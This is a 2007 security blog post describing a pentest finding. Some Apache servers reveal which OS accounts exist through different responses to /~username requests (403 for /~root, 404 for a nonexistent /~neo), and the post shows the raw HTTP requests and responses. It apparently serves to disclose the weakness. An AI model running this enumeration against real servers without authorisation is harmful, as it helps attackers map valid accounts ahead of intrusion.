Wednesday, October 17, 2007

Enumerating OS Accounts through Web Server

We noticed an interesting vulnerability during a recent pentest. This vulnerability is specific to certain versions of Apache web server running on *nix boxes.

The vulnerability is that one can enumerate OS accounts just by looking at the response codes and message returned by the web server when one tries to access the home directory for a particular user. Suppose one tries to access the root directory; the request from the browser would look something like this:

http://X.X.X.X/~root

GET /~root HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

The response received had an error code 403

HTTP/1.x 403 Forbidden
Date: Wed, 17 Oct 2007 06:45:58 GMT
Server: Apache
Keep-Alive: timeout=15
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

The response received had an error code 403. Also an error message like, "You don't have permission to access /~root on this server." is displayed.

When the same request is tried for a non existent user (neo as in the following case), the error code and message received in the response are different.

http://X.X.X.X/~neo

GET /~neo HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7
Accept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

The response received had an error code 404. The error message in this case was, "The requested URL /~neo was not found on this server".

HTTP/1.x 404 Not Found
Date: Wed, 17 Oct 2007 06:45:58 GMT
Server: Apache
Keep-Alive: timeout=15
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)